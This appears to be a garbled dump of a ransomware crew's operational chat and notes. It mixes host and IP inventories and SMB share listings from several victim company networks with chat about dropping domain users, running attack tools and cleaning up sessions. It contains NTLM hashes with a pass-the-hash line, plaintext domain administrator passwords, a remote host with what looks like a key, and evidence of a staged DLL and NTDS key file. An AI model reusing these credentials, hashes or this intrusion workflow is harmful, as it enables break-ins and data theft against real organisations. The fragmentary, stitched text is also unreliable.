89.0.192.80 -
89.0.191.172 -
89.0.192.3 -
89.0.193.15 -
10.1.10.146 -
89.0.192.202 -
10.58.58.91 -
10.89.11.34 -
``````
89.0.10.121 -
89.0.192.80 -
89.0.191.172 -
89.0.192.3 -
89.0.193.15 -
10.1.10.146 -
89.0.192.202 -
10.58.58.91 -
10.89.11.34 -
``````
ALLOYEXCH02: 10.1.1.240 +
GAHDC2: 10.1.10.81 +
GAHDC01: 10.1.10.82 +
``Thank you[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=Y7LiqEPosNs6nCCna) rtpco.losal guys drop the adusers from all the domains
ALLOYLICWEB: 10.1.1.238 ---
ALLOYAPP3: 10.1.1.250 ---
``````
rtpco.local\O365Service 7facdc498ed1680c4fd1448319a8c04f
 
AXFORMS-DEV: 10.89.11.111 -
ONBASETEST: 10.89.11.10 -
``Try pulling in''.
pth us.alloypolymers.com\adonixadmin 88781646e2a2399370c54bae7f790e58
ALLOYAMMS: 10.1.1.231 -
ALLOYEXCH02: 10.1.1.240 - -
GAHDC2: 10.1.10.81 -
ALLOYCRKT01: 10.1.5.250 - -
OHSPICEWORKS: 10.1.10.11 -
ALLOYORGAPP01: 10.1.8.11 -
GAHDC01: 10.1.10.82 -
``cancelet 8669993c0b6f8d65cd206a0c9e1d598bO365Service 7facdc498ed1680c4fd1448319a8c04f I moved thecob from #wilsonart-com
74.118.138.118
https://neteric.com
----------------------------------------------------------------------------------------
104.243.44.69:13574
Cqr7797e1iSJyzFwnyTPoECVpWqqOSUGUZ7
``````
++rtpco.local SERV++
AXAOS-TEST: 10.89.11.123
AXAOS-TRAINING: 10.89.11.122
WINONAV1: 10.89.11.22
AXBATCH-TEST: 10.89.11.112
AXAOS-BUILD: 10.89.11.120
SAN-HQ: 10.89.11.35
AXDEV3: 10.89.11.103
AXDEV6: 10.89.11.106
AXDEV1: 10.89.11.101
MINITABLIC: 10.89.11.6
AXDEV2: 10.89.11.102
TX-TESTSRV1: 10.58.0.166
AXSQL-DEV: 10.89.11.118
MXSTORAGE: 10.13.0.14
NEVADAHYPV1: 10.57.0.84
NVSTORAGE: 10.57.0.36
NVDC1: 10.57.0.32
MNDC2: 89.0.0.83
NEVADAHYPV1: 10.57.0.25
++us.alloypolymers.com++
RICHMONDDC1: 10.1.1.248
ALLOYLICWEB: 10.1.1.238
ALLOYAPP3: 10.1.1.250
``````
++rtpco.local SERV++
STORAGEWINONA: 10.89.11.13
CTXCONNECTOR1: 10.89.11.26
CTXCONNECTOR2: 10.89.11.27
RDSL: 10.89.11.21
SQLPROD1: 10.89.0.99
CTXAPP3: 10.89.11.28
KASEYA: 10.89.11.24
CTXAPP4: 10.89.11.11
ONBASETEST: 10.89.11.10
ONBASEPROD1: 10.89.11.7
ONBASETEST01: 10.89.11.33
WEBPROD01: 10.89.11.31
PDM01: 10.89.11.32
MAINTENANCE: 10.89.11.40
SOLARWINDS: 10.89.11.2
WINPAK01: 10.89.0.111
MNDC2: 89.0.0.81
STORAGEWINONA2: 10.89.11.14
EXCHANGE: 10.89.11.10
AXFORMS-DEV: 10.89.11.111
INDYDC1: 10.59.0.4
ADMT: 10.89.11.5
AXREPORTS-DEV: 10.89.11.121
``````
++rtpco.local SERV++
FRANCEDC1: 10.4.0.25
FRANCEDC2: 10.4.0.26
FRANCESTORAGE: 10.4.0.27
FRANCEPRINTSRV: 10.4.0.28
GERMANYDC1: 10.20.0.40
GERMANYDC2: 10.20.0.41
FR-VIR2008-02: 10.4.0.19
GERMANYSTORAGE: 10.20.0.42
FRANCESAGE: 10.4.0.100
FRANCEINTERMEC: 10.4.0.72
FRANCEARCHIVE: 10.4.0.10
POLSTORAGE: 10.28.0.8
DC1POLAND: 10.28.0.5
DC2POLAND: 10.28.0.6
DELLOME: 10.89.11.16
INDC2: 10.59.0.31
CAE1: 10.89.11.12
RTPSYSLOG: 89.0.192.125
INDYSTORAGE: 10.59.0.35
INVEEAM: 10.59.0.21
RTPAZAD: 10.89.0.190
RDSAPP4: 89.0.192.163
SYMMGR: 10.89.11.20
``````
++rtpco.local++
SG20170712-NB: 10.5.1.89
24L5: 10.33.2.239
RTP-KEN: 10.7.2.208
30L43: 89.0.192.45
ADAM-DESKTOP: 89.0.192.87
BBDESK2: 89.0.192.80
23LL37: 89.0.193.36
23LL7: 10.12.1.7
29LL32: 10.25.0.136
31LL45: 10.36.5.247
10.89.11.3 DRAW ALL DISKS
METROMTRREADER: 89.0.191.183
29LL9: 10.1.8.104
30L29: 10.1.8.157
DENNIS10: 10.33.255.253
LUNCHROOM2: 89.0.6.100
DEPCON10B: 89.0.192.150
30L59: 172.22.200.30
WIN7-INTERMEC: 10.4.72.72
26L22: 10.33.4.245
24L19: 172.22.200.18
25L32: 89.0.192.169
24L3: 10.33.1.250
25L21: 172.22.200.26
26L08: 10.58.0.197
29L06: 89.0.191.87
INDYTEST1: 10.59.0.105
25L12: 89.0.193.67
DEPCON10A: 89.0.192.146
32LL62: 89.0.192.244
30L69: 89.0.192.35
VIDEOINSIGHTDR: 10.89.11.33
CANCELET: 10.89.11.22
30L85: 89.0.192.92
26L07: 10.12.1.3
24L11: 10.58.0.135
26L13: 10.58.6.11
ORION24: 89.0.191.71
25L58: 10.58.0.231
28L24: 10.57.0.85
EQL-SAN1: 10.89.5.100
QATHERMAL: 89.0.191.80
30L60: 89.0.192.78
````SDIJ*FHg78SDFGTI&SDtARTE%YET ``don't forget WOL
++rtpco.local++
28LL75: 172.22.200.29
30L22: 10.1.5.151
W10-F2018-VIB: 10.4.1.46
W10-F2014-PYBA: 10.4.1.103
EQL-SAN2: 10.89.5.120
26L05: 172.22.200.24
30LL29: 89.0.192.177
30L17: 10.25.0.142
32LL29: 89.0.191.227
W10-P2017-LOG1: 10.28.0.179
26L29: 10.59.0.107
30L54: 89.0.191.174
28L10: 89.0.191.39
30L24A: 10.1.5.208
WINPAK-CLIENT: 10.89.11.1
30L03: 10.36.6.234
30L18: 172.22.200.76
26L59: 89.0.193.94
28LL56: 89.0.192.215
30L102: 10.59.0.120
30L96: 89.0.191.196
25L9: 89.0.191.43
SUZHOU-PROD: 10.7.2.61
33LL67: 89.0.192.215
28L40: 10.56.0.124
30L51: 10.56.0.126
DENNIS15: 89.0.88.20
DCHDESKTOP: 89.0.88.18
26L30: 89.0.191.217
30L41: 89.0.191.245
27L06: 89.0.192.160
25L5: 172.22.200.62
27L05: 172.22.200.59
25L52: 10.33.2.249
30L94: 10.59.0.156
28L16: 89.0.192.60
WIN7-2016-CHG: 10.28.0.100
AXUPS: 10.89.11.35
KEMPENBOXX: 89.0.193.108
26L47: 10.25.0.130
BSDESKTOP: 89.0.10.101
5CG5093XY1: 10.1.8.146
MXL5040QYD-1: 10.1.8.220
``````
++rtpco.local++
PRTMONITOR: 10.89.11.36
30L19: 89.0.192.127
27L04: 89.0.10.121
DEPCON10EM: 89.0.192.116
30L42: 89.0.192.83
27L12: 10.56.0.166
27L07: 89.0.191.57
30L10: 10.33.255.252
25L43: 172.22.200.66
30L47: 10.59.0.113
30L100: 89.0.192.80
30L98: 10.59.0.148
30L30: 10.1.8.145
25L38: 89.0.192.172
30L56: 89.0.191.172
30L36: 10.1.8.143
25L29: 89.0.192.3
PHONEROOMFR: 10.4.1.96
25L42: 89.0.193.15
30L65: 10.1.10.146
30L15: 172.22.200.16
VC1: 172.22.254.20
27L28: 172.22.200.11
WININTERMEC32: 89.0.192.202
32LL58: 10.58.58.91
26L15: 10.13.0.92
25L37: 89.0.192.47
USH832L0DT: 10.1.8.128
30L14: 10.36.5.236
UPS580: 89.0.191.216
SBRENNO: 89.0.193.38
22L10INDY: 10.89.11.34
25L23: 89.0.192.114
AVANITEN: 10.89.11.34
28L19: 89.0.191.215
W10-FR2018-CYC: 10.4.1.13
DEPCON10FR: 89.0.192.141
30L10: 89.0.193.76
26L251: 10.32.1.188
30L107: 89.0.191.64
25L59: 89.0.191.46
31LL19: 89.0.192.102
25L60: 89.0.193.101
``So, what do we start? Work some more here then, then, https://www.alibisecurity.com/alibi-central-management-software`http://10.0.0.202/doc/page/login.asp`` - ALIBI
``http://10.0.0.21/````
 SCCY-DC 10.0.0.5
 TS 10.0.0.252
 SCCY-LT08 10.0.0.22
 SCCY-LT09 10.0.0.99
 SCCY-LT10 10.0.0.88
 TOOLROOM7106 10.1.4.150
 RYAN-GT73VR 10.1.4.164
 QVPRO-PC 10.0.0.93
 QATRACKING 10.0.0.113
 PRODUCTION-LT 192.168.113.2
 ASSEMBLYROOM 10.0.0.28
 MIKE-PC 10.1.4.210
 MFGWIN10-1 10.0.0.110
 SCCY-TOOLING 10.0.0.19
 JOE-BOXX-W10 10.0.0.103
 JOE-AIO2 10.0.0.89
 ENGINEERING-PC2 10.1.4.205
 ENGINEERING-PC1 10.1.4.178
 CONNIE-MICRO 10.0.0.82
 SCCY-FS 10.0.0.6
 SCCY-16 10.0.0.102
 SCCY-15 10.0.0.118
 SCCY-12 10.0.0.111
 SCCY-11 10.0.0.123
 SCCY-10 10.0.0.41
 SCCY-14 10.0.0.17
 SCCY-09 10.0.0.119
 SCCY-08 10.0.0.128
 SCCY-07 10.0.30.143
 SCCY-06 10.0.0.146
 SCCY-21 10.0.0.147
 SCCY-17 10.0.0.149
 SCCY-TN01 10.0.30.147
 SCCY-13 10.0.0.148
 SCCY-18 10.0.0.116
 SCCY-04 10.0.0.40
 SCCY-03 10.0.0.57
 SCCY-02 10.0.0.84
 SCCY-19 10.0.0.62
 SCCY-05 10.0.0.59
 SCCY-01 10.0.0.76
 DESKTOP-UMQJ809 10.1.4.230
 SCCY-20 10.1.4.221
 SCCY-NAS 10.1.4.175
 SCCY-RECEIVING 10.0.0.91
 SQL-VM 10.1.4.99
 SCCY-LT3 10.0.0.75
 SCCY-LT04 10.0.0.67
 SCCY-LT05 10.0.0.71
 SCCY-LT07 10.0.0.26
 SCCY-MASONACS 10.0.30.3
``````
SCCY\vdsadmin T@ng0D0wn!
SCCY\VannData Y33tC@nn0ns
thank youuser7 but i forgot to delete it because my brain isn't even 20% working due to such a great work schedule[ ](https://mediaeveryone.com/group/sccy-com?msg=Q5how5FjdR49GsnJs) if ntds isn't related to hashes, it's a hash thing for google password keys or something they were asking a question or something someone was doing something about it.@user3 @user8[ ](https://mediaeveryone.com/group/sccy-com?msg=AL5cvDTfm6YBeQdpn) i nigdetsetka that little, there it worked for about 10 seconds...where else did you run it? chance of dropping after running it at times higherbx without parameters VERY much noise how many times i wrote at the end of the day - delete files, sessions in slipknot, it is not me why not deleted?
199.4KB fil 01/25/2021 17:31:02 msupdate.dll
 1.2KB fil 01/25/2021 17:39:36 ntds.pvk
``[ ](https://mediaeveryone.com/group/sccy-com?msg=xHQhm9FkNFqXrZRnm) Did you take off the badhound? If so, no parameters[ ](https://mediaeveryone.com/group/sccy-com?msg=BXrTsqRRDACMxqPoM) ?[ ](https://mediaeveryone.com/group/sccy-com?msg=4NT5tunCGfpFfNY84) how did you take it off? what were the startup parameters? ``
[+] Location: C:\Windows\Temp\*

 Size Type Last Modified Name
 ---- ---- ------------------- ----
            dir 01/25/2021 19:03:15 F18AC62B-E695-47FF-B459-2750FF73338D-Sigs
            dir 01/01/2021 13:35:09 WinSAT
 1.5MB fil 01/25/2021 19:14:36 MpCmdRun.log
 773.6KB fil 01/25/2021 19:03:34 MpSigStub.log
 199.4KB fil 01/25/2021 17:31:02 msupdate.dll
 1.2KB fil 01/25/2021 17:39:36 ntds.pvk
 256.0KB fil 10/14/2020 17:41:18 TS_784C.tmp
 320.0KB fil 10/14/2020 17:41:29 TS_A6D2.tmp
 1.0MB fil 11/17/2020 08:43:16 UpdHealthTools.msi
``Why are you working so dirty? everything is the same old way, creeds only from 1 NAS+add everyone to expFederal.com
I can't do anything with this lab.
https://cloudgw.cpcc.edu/vpn/index.html
```
 and what's up with that?)Sure you're with them? I don't see a confab I'll create expFederal.com = hobbes?
Do you need a confab for that?
\USCHI-HD001.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-HD001.Hobbes.loc\C$ - Default share
\USCHI-HD001.Hobbes.loc\IPC$ - Remote IPC
\USCHI-HD001.Hobbes.loc\print$ - Printer Drivers
\USCHI-APG003.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-APG003.Hobbes.loc\C$ - Default share
\USCHI-APG003.Hobbes.loc\E$ - Default share
\USCHI-APG003.Hobbes.loc\F$ - Default share
\USCHI-APG003.Hobbes.loc\IPC$ - Remote IPC
\PCHIVH001.Hobbes.loc\ADMIN$ - Remote Admin
\PCHIVH001.Hobbes.loc\C$ - Default share
\\{\PCHIVH001.Hobbes.loc\E$ - Default share
\PCHIVH001.Hobbes.loc\IPC$ - Remote IPC
\PCHIVH001.Hobbes.loc\V$ - Default share
\PCHIAPG015.Hobbes.loc\ADMIN$ - Remote Admin
\PCHIAPG015.Hobbes.loc\C$ - Default share
\PCHIAPG015.Hobbes.loc\IPC$ - Remote IPC
\USCHI-MAXP001.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-MAXP001.Hobbes.loc\C$ - Default share
\USCHI-MAXP001.Hobbes.loc\IPC$ - Remote IPC
\USCHI-MAXP001.Hobbes.loc\M$ - Default share
\USCHI-MAXP001.Hobbes.loc\print$ - Printer Drivers
\USCHI-LT002.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-LT002.Hobbes.loc\C$ - Default share
\USCHI-LT002.Hobbes.loc\IPC$ - Remote IPC
\USCHI-NET005.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-NET005.Hobbes.loc\C$ - Default share
\USCHI-NET005.Hobbes.loc\E$ - Default share
\USCHI-NET005.Hobbes.loc\IPC$ - Remote IPC
\USCHI-NET005.Hobbes.loc\print$ - Printer Drivers
\PCHIFSP001.Hobbes.loc\ADMIN$ - Remote Admin
\PCHIFSP001.Hobbes.loc\Apps
\\PCHIFSP001.Hobbes.loc\ARCH -
\PCHIFSP001.Hobbes.loc\C$ - Default share
\\PCHIFSP001.Hobbes.loc\Cad -
\\{\PCHIFSP001.Hobbes.loc\Citrix - Citrix Profiles
\PCHIFSP001.Hobbes.loc\CIVIL -
\\PCHIFSP001.Hobbes.loc\COMM -
\PCHIFSP001.Hobbes.loc\COMP -
\PCHIFSP001.Hobbes.loc\CONST -
\\PCHIFSP001.Hobbes.loc\D$ - Default share
\\PCHIFSP001.Hobbes.loc\ELEC -
\\PCHIFSP001.Hobbes.loc\EXEC -
\\PCHIFSP001.Hobbes.loc\F$ - Default share
\\PCHIFSP001.Hobbes.loc\FS-0043 -
\\PCHIFSP001.Hobbes.loc\FS-0044 -
\PCHIFSP001.Hobbes.loc\HR -
\\{\PCHIFSP001.Hobbes.loc\IPC$ - Remote IPC
\\PCHIFSP001.Hobbes.loc\IROA - IROA - ActiveInk Docs
\PCHIFSP001.Hobbes.loc\MARKET -
\PCHIFSP001.Hobbes.loc\MECH -
\\{\PCHIFSP001.Hobbes.loc\MKTG - Business Operations
\\PowerVault NAS Utilities - PowerVault NAS Utilities
\PCHIFSP001.Hobbes.loc\Network -
\PCHIFSP001.Hobbes.loc\Pccommon -
\PCHIFSP001.Hobbes.loc\proj_ae -
\PCHIFSP001.Hobbes.loc\proj_cvl -
\PCHIFSP001.Hobbes.loc\proj_str -
\\PCHIFSP001.Hobbes.loc\PTW6512 -
\PCHIFSP001.Hobbes.loc\Restricted$ -
\\PCHIFSP001.Hobbes.loc\Safety -
\PCHIFSP001.Hobbes.loc\SCANS -
\PCHIFSP001.Hobbes.locSECTLDR -
\\{\PCHIFSP001.Hobbes.loc\Software$ - expFederal Software
\\{\PCHIFSP001.Hobbes.loc\Standard -
\PCHIFSP001.Hobbes.loc\STRUCT -
\PCHIFSP001.Hobbes.loc\Sys - Project Folders
\PCHIFSP001.Hobbes.loc\TENGCNST -
\PCHIFSP001.Hobbes.loc\User$ - Users Folders
\USCHI-NET001.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-NET001.Hobbes.loc\C$ - Default share
\USCHI-NET001.Hobbes.loc\E$ - Default share
\USCHI-NET001.Hobbes.loc\IPC$ - Remote IPC
\USCHI-NET001.Hobbes.loc\print$ - Printer Drivers
\USCHI-NET001.Hobbes.loc\Software$ -
\USCHI-NET001.Hobbes.loc/USCHI-PLT-0008 - Oce ColorWare Plotter 300
\USCHI-MSE001.Hobbes.loc/address -
\USCHI-MSE001.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-MSE001.Hobbes.loc\C$ - Default share
\USCHI-MSE001.Hobbes.loc\E$ - Default share
\USCHI-MSE001.Hobbes.loc\F$ - Default share
\USCHI-MSE001.Hobbes.loc\G$ - Default share
\USCHI-MSE001.Hobbes.loc\IPC$ - Remote IPC
\USCHI-MSE004.Hobbes.loc\address -
\USCHI-MSE004.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-MSE004.Hobbes.loc\C$ - Default share
\USCHI-MSE004.Hobbes.loc\E$ - Default share
\USCHI-MSE004.Hobbes.loc\F$ - Default share
\USCHI-MSE004.Hobbes.loc\G$ - Default share
\USCHI-MSE004.Hobbes.loc\IPC$ - Remote IPC
\USCHI-APG004.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-APG004.Hobbes.loc\Analytics_c8466842-1a17-4bad-abad-7d935647974b -
\USCHI-APG004.Hobbes.loc\C$ - Default share
\USCHI-APG004.Hobbes.loc\E$ - Default share
\USCHI-APG004.Hobbes.loc\F$ - Default share
\\USCHI-APG004.Hobbes.loc\gthrsvc_c8466842-1a17-4bad-abad-7d935647974b-crawl-0 - Crawled Files Sharec8466842-1a17-4bad-abad-7d935647974b-crawl-0
\USCHI-APG004.Hobbes.loc\IPC$ - Remote IPC
\USCHI-APG004.Hobbes.loc\print$ - Printer Drivers
\USCHI-DCG002.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-DCG002.Hobbes.loc\C$ - Default share
\USCHI-DCG002.Hobbes.loc\IPC$ - Remote IPC
\USCHI-DCG002.Hobbes.loc\print$ - Printer Drivers
\PCHIWSG005.Hobbes.loc\ADMIN$ - Remote Admin
\PCHIWSG005.Hobbes.loc\AM -
\PCHIWSG005.Hobbes.loc\AMM3EXT$ - BC-Meridian Extensions Share
\PCHIWSG005.Hobbes.loc\C$ - Default share
\PCHIWSG005.Hobbes.loc\F$ - Default share
\PCHIWSG005.Hobbes.loc\IPC$ - Remote IPC
\PCHIAPG016.Hobbes.loc\ADMIN$ - Remote Admin
\PCHIAPG016.Hobbes.loc\C$ - Default share
\PCHIAPG016.Hobbes.loc\IPC$ - Remote IPC
\PCHIAPG016.Hobbes.loc\SophosUpdate -
\PCHIAPG016.Hobbes.loc\SUMInstallSet - Sophos Update Manager Installer
\USCHI-PWD001.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-PWD001.Hobbes.loc\C$ - Default share
\USCHI-PWD001.Hobbes.loc\E$ - Default share
\USCHI-PWD001.Hobbes.loc\F$ - Default share
\USCHI-PWD001.Hobbes.loc\G$ - Default share
\USCHI-PWD001.Hobbes.loc\IPC$ - Remote IPC
\USCHI-DCP001.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-DCP001.Hobbes.loc\C$ - Default share
\USCHI-DCP001.Hobbes.loc\DAG01.hobbes.loc - File share witness created for microsoft exchange database availability group DAG01.
\USCHI-DCP001.Hobbes.loc\IPC$ - Remote IPC
\USCHI-DCP001.Hobbes.loc/NETLOGON - Logon server share
\USCHI-DCP001.Hobbes.loc\SYSVOL - Logon server share
\PCHIAPG014.Hobbes.loc\ActiveAdministrator - Active Administrator Server Share
\PCHIAPG014.Hobbes.loc\ADMIN$ - Remote Admin
\\{\PCHIAPG014.Hobbes.loc\BEW-4ecbc619f6de49a39b3bda9cec5b9074 - Push Directory
\PCHIAPG014.Hobbes.loc\C$ - Default share
\PCHIAPG014.Hobbes.loc\DADevicePolicyMaster$ - DADevicePolicyMaster$ share
\PCHIAPG014.Hobbes.loc\E$ - Default share
\PCHIAPG014.Hobbes.loc\IPC$ - Remote IPC
\PCHIAPG014.Hobbes.loc\Logs$ - Logs$ share
\PCHIAPG014.Hobbes.loc\SLDAClient$ - SLDAClient$ share
\\PCHIAPG014.Hobbes.loc\Slogic$ - \PCHIAPG014\SLOGIC$ share
\PCHIAPG014.Hobbes.loc\SLscripts$ - SLscripts$ share
\PCHIWSG007.Hobbes.loc\ADMIN$ - Remote Admin
\PCHIWSG007.Hobbes.loc\C$ - Default share
\PCHIWSG007.Hobbes.loc\IPC$ - Remote IPC
\USCHI-DCG003.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-DCG003.Hobbes.loc\C$ - Default share
\USCHI-DCG003.Hobbes.loc\IPC$ - Remote IPC
\USCHI-DCG003.Hobbes.loc/NETLOGON - Logon server share
\USCHI-DCG003.Hobbes.loc\SYSVOL - Logon server share
\USCHI-BKP001.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-BKP001.Hobbes.loc\C$ - Default share
\USCHI-BKP001.Hobbes.loc\D$ - Default share
\USCHI-BKP001.Hobbes.loc\E$ - Default share
\USCHI-BKP001.Hobbes.loc\F$ - Default share
\USCHI-BKP001.Hobbes.loc\G$ - Default share
\USCHI-BKP001.Hobbes.loc\IPC$ - Remote IPC
\USCHI-BKP001.Hobbes.loc\print$ - Printer Drivers
\USCHI-PRT001.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-PRT001.Hobbes.loc\C$ - Default share
\USCHI-PRT001.Hobbes.loc\IPC$ - Remote IPC
\USCHI-PRT001.Hobbes.loc\print$ - Printer Drivers
\\Print$ - Plotters NAME should not contain "_" per vendor recommendation
\\USCHI-PRT001.Hobbes.loc\USCHI-PL_OCECW300_PS - USCHI-PL_OCECW300_PS
\USCHI-PRT001.Hobbes.loc\USCHI-PT_C5045 - South - Canon iR-ADV C5045/5051 PCL6
\USCHI-PRT001.Hobbes.loc\USCHI-PT_C5045_PS - South - Canon iR-ADV C50455051 PS3
\USCHI-PRT001.Hobbes.loc\USCHI-PT_C5255 - North - Canon iR-ADV C5250/5255 PCL6
\USCHI-PRT001.Hobbes.loc\USCHI-PT_C5255_PS - North - Canon iR-ADV C52505255 PS3
\USCHI-PRT001.Hobbes.loc\USCHI-PT_HPCM3530 - South - HP Color LaserJet CM3530
\USCHI-PRT001.Hobbes.loc\USCHI-PT_HPCM3530_PS - South - HP Color LaserJet CM3530 PS
\USCHI-PRT001.Hobbes.loc\USCHI-PT_HPCP3525 - HR Area - HP Color LaserJet CP3525 PCL6
\USCHI-PRT001.Hobbes.loc\USCHI-PT_HPCP3525_PS - HR Area - HP Color LaserJet CP3525 PS
\USCHI-MAXD001.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-MAXD001.Hobbes.loc\C$ - Default share
\USCHI-MAXD001.Hobbes.loc\IPC$ - Remote IPC
\USCHI-MAXD001.Hobbes.loc\M$ - Default share
\USCHI-MSE003.Hobbes.loc\address -
\USCHI-MSE003.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-MSE003.Hobbes.loc\C$ - Default share
\USCHI-MSE003.Hobbes.loc\E$ - Default share
\USCHI-MSE003.Hobbes.loc\F$ - Default share
\USCHI-MSE003.Hobbes.loc\G$ - Default share
\USCHI-MSE003.Hobbes.loc\IPC$ - Remote IPC
\USCHI-SQL001.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-SQL001.Hobbes.loc\C$ - Default share
\USCHI-SQL001.Hobbes.loc\E$ - Default share
\USCHI-SQL001.Hobbes.loc\IPC$ - Remote IPC
\USCHI-SQL001.Hobbes.loc\print$ - Printer Drivers
\\Remote Admin $\DT-000037.Hobbes.loc\ADMIN$ - Remote Admin
\DT-000037.Hobbes.loc\C$ - Default share
\DT-000037.Hobbes.loc\IPC$ - Remote IPC
\PCHIWSG006.Hobbes.loc\70182862-e52d-4fb0-bea2-3448c35de88f-query-0 - Used by Microsoft Search Server 2010 to copy index files between servers.
\PCHIWSG006.Hobbes.loc\ADMIN$ - Remote Admin
\PCHIWSG006.Hobbes.loc\C$ - Default share
\PCHIWSG006.Hobbes.loc\IPC$ - Remote IPC
\USCHI-MSE002.Hobbes.loc\address -
\USCHI-MSE002.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-MSE002.Hobbes.loc\C$ - Default share
\USCHI-MSE002.Hobbes.loc\E$ - Default share
\USCHI-MSE002.Hobbes.loc\F$ - Default share
\USCHI-MSE002.Hobbes.loc\G$ - Default share
\USCHI-MSE002.Hobbes.loc\IPC$ - Remote IPC
\USCHI-DCG001.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-DCG001.Hobbes.loc\C$ - Default share
\USCHI-DCG001.Hobbes.loc\IPC$ - Remote IPC
\USCHI-DCG001.Hobbes.loc/NETLOGON - Logon server share
\USCHI-DCG001.Hobbes.loc\SYSVOL - Logon server share
\\{\PCHIDCG004.Hobbes.loc\ADMIN$ - Remote Admin
\PCHIDCG004.Hobbes.loc\C$ - Default share
\PCHIDCG004.Hobbes.loc\IPC$ - Remote IPC
\PCHIDCG004.Hobbes.loc\NETLOGON - Logon server share
\PCHIDCG004.Hobbes.loc\slETL$ -
\PCHIDCG004.Hobbes.loc\SYSVOL - Logon server share
\USCHI-LSS001.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-LSS001.Hobbes.loc\C$ - Default share
\\Extreme Loading_for_Structures - Extreme Loading┬" for Structures
\USCHI-LSS001.Hobbes.loc\IPC$ - Remote IPC
\USCHI-SPS001.Hobbes.loc/ADMIN$ - Remote Admin
\\USCHI-SPS001.Hobbes.loc\Analytics_8bda09f0-8cbc-4c38-8854-922eb0553239 -
\USCHI-SPS001.Hobbes.loc\C$ - Default share
\USCHI-SPS001.Hobbes.loc\E$ - Default share
\\USCHI-SPS001.Hobbes.loc\gthrsvc_8bda09f0-8cbc-4c38-8854-922eb0553239-crawl-0 - Crawled Files Share8bda09f0-8cbc-4c38-8854-922eb0553239-crawl-0
\USCHI-SPS001.Hobbes.loc\IPC$ - Remote IPC
\USCHI-NWA001.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-NWA001.Hobbes.loc\C$ - Default share
\USCHI-NWA001.Hobbes.loc\E$ - Default share
\USCHI-NWA001.Hobbes.loc\IPC$ - Remote IPC
\USCHI-NWA001.Hobbes.loc\KC$ -
\USCHI-NWA001.Hobbes.loc\Netwrix_Auditor_Subscriptions$ - This is a default share for uploading Netwrix Auditor subscriptions.
\USCHI-NWA001.Hobbes.loc\Netwrix_UAVR$ - This share contains audit data on user activity collected by Netwrix Auditor.
\USCHI-NWA001.Hobbes.loc\print$ - Printer Drivers
\\Prints$ - Remote Admin
\LT-000108.Hobbes.loc\C$ - Default share
\LT-000108.Hobbes.loc\IPC$ - Remote IPC
\USCHI-VHH010.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-VHH010.Hobbes.loc\C$ - Default share
\USCHI-VHH010.Hobbes.loc\E$ - Default share
\USCHI-VHH010.Hobbes.loc\IPC$ - Remote IPC
\PCHIDCG003.Hobbes.loc\ADMIN$ - Remote Admin
\PCHIDCG003.Hobbes.loc\C$ - Default share
\PCHIDCG003.Hobbes.loc\IPC$ - Remote IPC
\PCHIDCG003.Hobbes.loc\NETLOGON - Logon server share
\PCHIDCG003.Hobbes.loc\slETL$ -
\PCHIDCG003.Hobbes.loc\SYSVOL - Logon server share
\\{\PCHIAPG011.Hobbes.loc\ADMIN$ - Remote Admin
\PCHIAPG011.Hobbes.loc\C$ - Default share
\PCHIAPG011.Hobbes.loc\IPC$ - Remote IPC
\PCHIAPG011.Hobbes.loc\Lenel$ -
\USCHI-PWA001.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-PWA001.Hobbes.loc\C$ - Default share
\USCHI-PWA001.Hobbes.loc\E$ - Default share
\USCHI-PWA001.Hobbes.loc\F$ - Default share
\USCHI-PWA001.Hobbes.loc\G$ - Default share
\USCHI-PWA001.Hobbes.loc\H$ - Default share
\USCHI-PWA001.Hobbes.loc\IPC$ - Remote IPC
\\ClusterStorage$ - Cluster Shared Volumes Default Share
\DAG01.Hobbes.loc/IPC$ - Remote IPC
\\{\DT-000033.Hobbes.loc\A$ - Default share
\DT-000033.Hobbes.loc\ADMIN$ - Remote Admin
\\{\DT-000033.Hobbes.loc\C$ - Default share
\DT-000033.Hobbes.loc\IPC$ - Remote IPC
\SQL0005.Hobbes.loc\ActiveInk -
\SQL0005.Hobbes.loc\ADMIN$ - Remote Admin
\\SQL0005.Hobbes.loc\C$ - Default share
\\SQL0005.Hobbes.loc\E$ - Default share
\SQL0005.Hobbes.loc\F$ - Default share
\\SQL0005.Hobbes.loc\G$ - Default share
\SQL0005.Hobbes.loc\IPC$ - Remote IPC
\\SQL0005.Hobbes.loc\Temp -
\USCHI-WSUS001.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-WSUS001.Hobbes.loc\C$ - Default share
\USCHI-WSUS001.Hobbes.loc\E$ - Default share
\USCHI-WSUS001.Hobbes.loc\IPC$ - Remote IPC
\USCHI-WSUS001.Hobbes.loc\UpdateServicesPackages - A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.
\USCHI-WSUS001.Hobbes.loc\WsusContent - A network share to be used by Local Publishing to place published content on this WSUS system.
\USCHI-WSUS001.Hobbes.loc\WSUSTemp - A network share used by Local Publishing from a Remote WSUS Console Instance.
\USCHI-NET002.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-NET002.Hobbes.loc\AdminUIContentPayload - AdminUIContentPayload share for AdminUIContent Packages
\USCHI-NET002.Hobbes.loc\C$ - Default share
\USCHI-NET002.Hobbes.loc\Client -
\USCHI-NET002.Hobbes.locD -
\USCHI-NET002.Hobbes.loc\DeploymentShare$ - MDT Deployment Share
